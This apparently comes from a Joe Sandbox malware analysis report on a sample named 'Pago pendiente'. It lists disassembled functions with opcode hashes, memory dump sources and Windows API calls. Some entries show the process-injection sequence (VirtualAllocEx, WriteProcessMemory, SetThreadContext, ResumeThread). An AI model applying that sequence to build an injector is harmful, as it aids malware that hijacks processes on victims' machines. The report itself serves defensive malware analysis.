                                                          • Opcode Fuzzy Hash: fa0861353e611e75dc8c1268660520b183bdeca07bec75b8c53d79f1d3dc3282
                                                          • Instruction Fuzzy Hash: D461B3B4B10218DFDB119B65D8197BE7BB2FB88741F208429F556AB3C4CE309D42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772ACF8 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8iq$8iq
                                                          • API String ID: 0-767271662
                                                          • Opcode ID: 3c1866bc60bd08d353236227fa9edd665fab5e3e62d3683bb24d435423654a1d
                                                          • Instruction ID: 7e475a332bae227190033a6a4ad0c3f5e1b5c97273a8998cb23a795cd298f445
                                                          • Opcode Fuzzy Hash: 3c1866bc60bd08d353236227fa9edd665fab5e3e62d3683bb24d435423654a1d
                                                          • Instruction Fuzzy Hash: E63104B0F1422ADFCB04DB6CC446A7E77F1EB85381F128469D921AB285DA308D429791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726DD8 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5$3H5
                                                          • API String ID: 0-2752242361
                                                          • Opcode ID: 70923b15bfd4bf03323ef637ae789bd74de7565c758ffb636c9386ef4efdf964
                                                          • Instruction ID: 014c8fe1c807bf9fe32b6413bf656ad90e842ced42cf4554e5737576288fd9bd
                                                          • Opcode Fuzzy Hash: 70923b15bfd4bf03323ef637ae789bd74de7565c758ffb636c9386ef4efdf964
                                                          • Instruction Fuzzy Hash: F72105B0D1121AEFCB44CFAAC540AAEFBF1BF89200F14C5AA9518E7214E7309A41DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57BD4 Relevance: 1.8, APIs: 1, Instructions: 273processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57E16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 8eb417afa48745457ac69641b8721f9d844db1277017d2e85158ce4ca8f4e5b1
                                                          • Instruction ID: 4caf66ba95b74c9c0fcb389e0f28cc1d13a9f4367779f8765f8c0e43d368b77c
                                                          • Opcode Fuzzy Hash: 8eb417afa48745457ac69641b8721f9d844db1277017d2e85158ce4ca8f4e5b1
                                                          • Instruction Fuzzy Hash: 79A14AB1D0061ACFDB21CF69C841BEDBBB2BF88310F14856AD859B7250DB749985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57BE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57E16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 23e0786626ac8cab9f9dfbfbb5131fa007018eceea6577211eb1193422a80536
                                                          • Instruction ID: 0e095b537e89c8524d3d549cdc7bb6c0ea15dec27ba836806480574b410f5dd5
                                                          • Opcode Fuzzy Hash: 23e0786626ac8cab9f9dfbfbb5131fa007018eceea6577211eb1193422a80536
                                                          • Instruction Fuzzy Hash: 91913BB1D0061ACFDB21CF69C841BADBBB2BF49310F148569DC19B7250DB749985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B1C70 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab0d56ba29c794db302517cc9c7c57e2baaefe1b4ec4b64e97eeb8ed65666ea3
                                                          • Instruction ID: d74489bfdc1bac3f6a464a6222ba9646fc8f6386277467f2940d99ec7a69e56c
                                                          • Opcode Fuzzy Hash: ab0d56ba29c794db302517cc9c7c57e2baaefe1b4ec4b64e97eeb8ed65666ea3
                                                          • Instruction Fuzzy Hash: DF8185B1C04389AFDB02CFA5D894ACDBFB5FF09310F14819AE948AB221D3789949CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AB117 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031AB37E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 2571b82029c01fd6120ea42cb302b5db599f5378d8b0ae9f8fd12bbd7691ea8a
                                                          • Instruction ID: 1b0cf552842e6b0e66b7274a2ade6d605da56dd8bfffe7fff1b703f287700f51
                                                          • Opcode Fuzzy Hash: 2571b82029c01fd6120ea42cb302b5db599f5378d8b0ae9f8fd12bbd7691ea8a
                                                          • Instruction Fuzzy Hash: 218165B4A00B458FD724DF69D44475ABBF1FF48301F048A2ED48ADBA50DB34E949CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B1DC4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1EE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 826851fe716bdfefe684a37a7aade06a0a0f038f562b413e88bc23ea95079cca
                                                          • Instruction ID: 6902593cd4d582dbf72dbd5c8849cdd1817c1d75fd487355b8a8840c4052943b
                                                          • Opcode Fuzzy Hash: 826851fe716bdfefe684a37a7aade06a0a0f038f562b413e88bc23ea95079cca
                                                          • Instruction Fuzzy Hash: D751CEB1D103099FDB14CF9AC994ADEBBF5BF48310F24812AE819AB210D771A945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B1DD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1EE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: f7cc6b7f92fe3980d9e3a8873f6588bc641e3496f4126089c9f2823ef626ca9c
                                                          • Instruction ID: 91394a2f764ce95074d90d01bcb6ddb536f99be4d9aa855d8e4a3948c0761c34
                                                          • Opcode Fuzzy Hash: f7cc6b7f92fe3980d9e3a8873f6588bc641e3496f4126089c9f2823ef626ca9c
                                                          • Instruction Fuzzy Hash: CB41CFB1D103499FDB14CF9AC894ADEBBF5BF48310F24812AE819AB310D771A945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031A4A64 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 031A5F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 911f8cb0b5f2fdc87b6235d682cea40f134c052e56c5ae830d57c9ed49f76d34
                                                          • Instruction ID: 9b553105e2cc8a3dd29df8eaac4c6cf5512fda4c41ab4b2c5ce5b9c2084b825d
                                                          • Opcode Fuzzy Hash: 911f8cb0b5f2fdc87b6235d682cea40f134c052e56c5ae830d57c9ed49f76d34
                                                          • Instruction Fuzzy Hash: AB41D0B4C04719CBDB24CFA9C844B9DBBF6FF49304F20816AD508AB251DB756989CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031A5E7C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 031A5F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: fedd8248b54b4a8d9c37f4e0c3b5b7be8be69cdd62dd29ebc75d05d772c4b6f1
                                                          • Instruction ID: 2e0f439536edbe315c0fe6128ce92cc82fb9d7cf456e27cf631a2180fcaac4f8
                                                          • Opcode Fuzzy Hash: fedd8248b54b4a8d9c37f4e0c3b5b7be8be69cdd62dd29ebc75d05d772c4b6f1
                                                          • Instruction Fuzzy Hash: 1841DFB4C00719CBDB24CFA9C844A8DBBF6FF49304F20816AD408AB251DB75698ACF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B4520 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 058B45E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: ece9de1b8642e5fa77e1918aff662b4e706094f29719d4c8afdd71a8b8935ca0
                                                          • Instruction ID: eb6dbd8690e5aeee9042334c4e7fb975ad4710ea4ae1de2a842e84e84c88618c
                                                          • Opcode Fuzzy Hash: ece9de1b8642e5fa77e1918aff662b4e706094f29719d4c8afdd71a8b8935ca0
                                                          • Instruction Fuzzy Hash: 7D414CB5900705CFDB14CF89C449AAABBF6FB88314F24C459D919AB321D370A945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57951 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A579E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 17a30445a1e4da12163a6bcf9e975f4b528ddc07fd48d3e549ac6e361a17a419
                                                          • Instruction ID: bbde66cafd42729f4006ac478c35d6b41ac160fe0ae3e5a7ec75f37f211aef3a
                                                          • Opcode Fuzzy Hash: 17a30445a1e4da12163a6bcf9e975f4b528ddc07fd48d3e549ac6e361a17a419
                                                          • Instruction Fuzzy Hash: 76214BB6900309DFCB10CFA9C981BEEBBF5FF48320F10842AE959A7241D7749944DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57958 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A579E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 4aab01ddc8aa9da5d99ada10d24833af8c1468398965c142ed89d8452708e471
                                                          • Instruction ID: 8a267e2cadf602da35c4de6bccd973204441047aebe338be68c53db7308f3e33
                                                          • Opcode Fuzzy Hash: 4aab01ddc8aa9da5d99ada10d24833af8c1468398965c142ed89d8452708e471
                                                          • Instruction Fuzzy Hash: A52127B5900359DFCB10CFA9C985BEEBBF5FF48310F10842AE959A7240D7789944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A577BB Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A5783E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 7d1a97163c253596b61b28e7ccc88dd38db1738914daba07dba7bef7a6f49608
                                                          • Instruction ID: abbd9b72d58d9d9d1f24aa791bd7281c18c8377a1ce672ce9d53fbefbedbe1a7
                                                          • Opcode Fuzzy Hash: 7d1a97163c253596b61b28e7ccc88dd38db1738914daba07dba7bef7a6f49608
                                                          • Instruction Fuzzy Hash: 00215CB1D002099FDB10CFAAC4857EEBFF4EF88320F14842AD819A7241DB789945CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57A40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57AC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: e34516c70dae1f9720ef49c1605b25affe5477b788c7b252e6e61571914df870
                                                          • Instruction ID: e22a3df43edcbec1a2ccf8a728960f1053b1034e92b5b1eb6bf765927b7ef597
                                                          • Opcode Fuzzy Hash: e34516c70dae1f9720ef49c1605b25affe5477b788c7b252e6e61571914df870
                                                          • Instruction Fuzzy Hash: DE214AB6C002099FCF10CFA9C9806EEFBF5FF48320F14842AE918A7241D7349541DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AD5DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031AD9B6,?,?,?,?,?), ref: 031ADA77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: e58a2a184b1a2f932864edd140faedd1ff2b5cc95b538f9984cd9c3ac8b6d264
                                                          • Instruction ID: 2acb61f5cdd5049fe3379f2964b04fa89bf3af3589710f6760f0aca337d3e67b
                                                          • Opcode Fuzzy Hash: e58a2a184b1a2f932864edd140faedd1ff2b5cc95b538f9984cd9c3ac8b6d264
                                                          • Instruction Fuzzy Hash: 6D21E4B5904609DFDB10CF9AD984ADEFFF8EB48310F14841AE919A7310D374A944DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A577C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A5783E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 09fb9e7dfae7d20ebf6acfa0dcf651be98f9e3307d59b27aad7e42cb4ad3f067
                                                          • Instruction ID: 4135fc157facb862eafb03e3d6b5eb20aa6da32b707d9ca0041026e2453451fb
                                                          • Opcode Fuzzy Hash: 09fb9e7dfae7d20ebf6acfa0dcf651be98f9e3307d59b27aad7e42cb4ad3f067
                                                          • Instruction Fuzzy Hash: CE212CB1D003099FDB10DFAAC4857EEBBF4EF98324F148429D919A7241DB789945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57A48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57AC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 15d1d1d43a70543d5ffd6d91e70a1bfdd7045a0ddea4e554a7564789d6141f81
                                                          • Instruction ID: ad5b97b9700be0df84828f027b61be5fbeaca58d152e096dfc12dfa5db0c1752
                                                          • Opcode Fuzzy Hash: 15d1d1d43a70543d5ffd6d91e70a1bfdd7045a0ddea4e554a7564789d6141f81
                                                          • Instruction Fuzzy Hash: 182139B1C003599FCB10CFAAC880AEEFBF5FF48320F14842AE919A7241D7349944DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AD9E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031AD9B6,?,?,?,?,?), ref: 031ADA77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 5c69c715103f7818cea222a305e94cacc359e12077f3699ee6b7116c523288bb
                                                          • Instruction ID: ffa2d932ffbfbd6f918a8c60d9a1948473b21afc624082b2fa228bcc852cd0ca
                                                          • Opcode Fuzzy Hash: 5c69c715103f7818cea222a305e94cacc359e12077f3699ee6b7116c523288bb
                                                          • Instruction Fuzzy Hash: 892103B5900249DFDB10CFA9D984ADEBBF4EB08310F14841AE918A3310C334A940CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57893 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57906
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 5f8350cf5f8578f311e5b7ba593d5a1f571c5179933dce42baf4633ba8a60617
                                                          • Instruction ID: b34fa29217ab1e967eed10b1a77994a7cdbfb6c119885c410f8c091a0fd6332d
                                                          • Opcode Fuzzy Hash: 5f8350cf5f8578f311e5b7ba593d5a1f571c5179933dce42baf4633ba8a60617
                                                          • Instruction Fuzzy Hash: 02116D769002099FCB10DFA9C844ADFBFF5EF49320F148419E915A7250CB759540DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AA4B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB3F9,00000800,00000000,00000000), ref: 031AB5EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 2a025be055843349978c966acf1bcd9d6356b828f1e295a6f2cdac95144f893c
                                                          • Instruction ID: b7da2c9164675ca192fd09bab1aca143d5c1730b16794adc843434f70d30702e
                                                          • Opcode Fuzzy Hash: 2a025be055843349978c966acf1bcd9d6356b828f1e295a6f2cdac95144f893c
                                                          • Instruction Fuzzy Hash: C01126B68047498FCB14CF9AC844ADEFBF4EB48310F14842ED919A7200C375A945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AB578 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB3F9,00000800,00000000,00000000), ref: 031AB5EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 1dbc9ccdfef46fd3bf13ad7292169be5f489963a230d6a14d1beb54e54a5dd7e
                                                          • Instruction ID: b54298102e4ccdfef94ef982cf7b9f874e245119bae073927451df20668e078f
                                                          • Opcode Fuzzy Hash: 1dbc9ccdfef46fd3bf13ad7292169be5f489963a230d6a14d1beb54e54a5dd7e
                                                          • Instruction Fuzzy Hash: 2911F6B6C043499FDB14CF9AD844ADEFBF9EB58320F14841ED919A7200C375A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57898 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57906
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: aedcca354e9ecc001f1893497c8a2046d3b158887bc0d99ec97a30d0587bfb8c
                                                          • Instruction ID: c94b73a3d788fd2255e2c8af381fad39a8ac3e291104f81df4d69a76f5da9cdc
                                                          • Opcode Fuzzy Hash: aedcca354e9ecc001f1893497c8a2046d3b158887bc0d99ec97a30d0587bfb8c
                                                          • Instruction Fuzzy Hash: 42113A759002499FCB10DFAAC844ADEBFF5EF88320F148819E915A7250C7759944DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A5770B Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 734391d4751111cc3fd2930f66271421671a0622b207ebab701ec8bfed0d4c50
                                                          • Instruction ID: 6da69e94c2f06aa0b270d3f2cb2c36209d9b9d80e202ec8bcb0b02bfbcd1cf01
                                                          • Opcode Fuzzy Hash: 734391d4751111cc3fd2930f66271421671a0622b207ebab701ec8bfed0d4c50
                                                          • Instruction Fuzzy Hash: 321146B59002498FCB20DFAAD8856EEFBF4EB88320F14841AD429A7240CA356944CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A57710 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 632f7a1c7a8ac66a498c1dcfe082c258d71e9606d33f4dca2deeb5bf47a30593
                                                          • Instruction ID: 944416c6442104436f69df33ace7ecc42308c46f8243524a0668b36bab1245f3
                                                          • Opcode Fuzzy Hash: 632f7a1c7a8ac66a498c1dcfe082c258d71e9606d33f4dca2deeb5bf47a30593
                                                          • Instruction Fuzzy Hash: 19113AB5D002498FDB20DFAAD8857DEFBF4EF98320F148419D519A7240CB756944CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A56648 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A42D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 9b87a31c4b1f331ab038b52a004a13ea13212eb14eebe43ec5ca7f0915bd2c21
                                                          • Instruction ID: b7474d2fb3747b0998d1759293b8796d184d8557a2ee3a9900d55bc00b8720bd
                                                          • Opcode Fuzzy Hash: 9b87a31c4b1f331ab038b52a004a13ea13212eb14eebe43ec5ca7f0915bd2c21
                                                          • Instruction Fuzzy Hash: F91103B5900349DFCB20DF9AD888BDEBFF8EB48320F108459E919A7200D375A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

